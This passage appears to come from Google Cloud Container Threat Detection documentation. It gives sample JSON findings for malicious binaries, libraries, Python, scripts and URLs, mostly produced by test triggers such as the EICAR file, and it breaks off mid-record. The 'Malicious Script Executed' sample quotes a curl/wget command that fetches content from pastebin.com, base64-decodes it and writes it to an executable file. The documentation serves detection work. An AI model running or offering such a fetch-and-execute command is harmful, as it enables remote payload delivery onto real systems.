            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.108.174.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.108.174.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911603",
            "nanos": 535268047
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

执行:已执行内置恶意二进制文件

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Built in Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:57.405Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:57.250Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "NATIVE_API"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/eicar_testing_file\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/eicar_testing_file\"",
          "\"built-in-malicious-binary-818358caa95b6d42\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-built-in-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "built_in_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 603253608
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1106/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

执行:已执行恶意 Python

{
  "finding": {
    "canonicalName": "projects/PROJECT_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Execution: Malicious Python executed",
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_IMAGE_URI",
        "imageId": "CONTAINER_IMAGE_ID",
        "createTime": "2024-06-17T18:50:13Z"
      }
    ],
    "createTime": "2024-06-17T18:50:15.454Z",
    "description": "A machine learning model using Natural Language Processing  techniques identified an executed python script as malicious.",
    "eventTime": "2024-06-17T18:50:15.217Z",
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "NAMESPACE",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_IMAGE_URI",
              "imageId": "CONTAINER_IMAGE_ID",
              "createTime": "2024-06-17T18:50:13Z"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER",
        "PYTHON"
      ],
      "additionalTactics": [
        "COMMAND_AND_CONTROL"
      ],
      "additionalTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "INTERPRETER",
          "size": "3492656",
          "sha256": "INTERPRETER_SHA_256",
          "hashedSize": "3492656",
          "partiallyHashed": false,
        },
        "script": {
          "path": "FILENAME",
          "size": "4191",
          "sha256": "SHA_256",
          "hashedSize": "4096",
          "partiallyHashed": true,
          "contents": "\"#!/usr/bin/env python\\n\\nimport uuid\\nimport subprocess\\nimport os\\nimport sys\\nsys.exit(0)…",
        },
        "args": [
          "INTERPRETER",
          "FILENAME"
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"CONTAINER_NAME\""
          },
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "displayName": "CLUSTER_ID",
    "type": "google.container.Cluster",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "container.googleapis.com",
    "location": "ZONE",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_ID",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
  },
  "sourceProperties": {
    "Process_Arguments": [
      "INTERPRETER",
      "FILENAME"
    ],
    "VM_Instance_Name": "INSTANCE_ID",
    "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      },
    "description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.",
    "Container_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 0
    },
    "Pod_Name": "CONTAINER_NAME",
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Parent_Pid": 1,
    "Container_Name": "CONTAINER_NAME",
    "Pid": 7,
    "Process_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 762524370
    },
    "Environment_Variables": [
    ],
    "Pod_Namespace": "default"
  }
}

  

执行:已执行经过修改的恶意二进制文件

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:51.893Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:51.525Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/file_to_be_modified\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/file_to_be_modified\"",
          "\"modified-malicious-binary-da2a7b72e6008bc3\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

执行:加载了经过修改的恶意库

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:55.271Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:55.133Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/malicious_files/file_to_be_modified\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/malicious_files/file_to_be_modified\"",
          "\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 124151422
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

已执行恶意脚本

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Malicious Script Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Script_Filename": "FILENAME",
      "Script_SHA256": "SHA_256",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "INTERPRETER",
      "Process_Arguments": ["INTERPRETER", "FILENAME"],
      "Pod_Name": "POD_NAME",
      "description": "A machine learning model using Natural Language Processing techniques identified an executed bash script as malicious.",
      "Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_Content": {
        "primitiveDataType": "STRING"
      },
      "Script_Filename": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_SHA256": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

观察到恶意网址

    {
      "findings": {
        "access": {},
        "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
        "category": "Malicious URL Observed",
        "containers": [
          {
            "name": "CONTAINER_NAME",
            "uri": "CONTAINER_URI",
            "imageId": "CONTAINER_IMAGE_ID"
          }
        ],
        "createTime": "2022-09-14T21:35:46.209Z",
        "database": {},
        "description": "A malicious URL is observed in the container workload.",
        "eventTime": "2022-09-14T21:35:45.992Z",
        "exfiltration": {},
        "findingClass": "THREAT",
        "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
        "indicator": {
          "uris": [
            "testsafebrowsing.appspot.com/s/malware.html"
          ]
        },
        "kubernetes": {
          "pods": [
            {
              "ns": "default",
              "name": "CONTAINER_NAME",
              "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
              ]
            }
          ]
        },
        "mitreAttack": {
          "primaryTactic": "COMMAND_AND_CONTROL",
          "primaryTechniques": [
            "INGRESS_TOOL_TRANSFER"
          ]
        },
        "mute": "UNDEFINED",
        "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
        "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
        "parentDisplayName": "Container Threat Detection",
        "processes": [
          {
            "binary": {
              "path": "\"/bin/echo\""
            },
            "script": {},
            "args": [
              "\"/bin/echo\"",
              "\"https://testsafebrowsing.appspot.com/s/malware.html\""
            ],
            "envVariables": [
              {
                "name": "\"PATH\"",
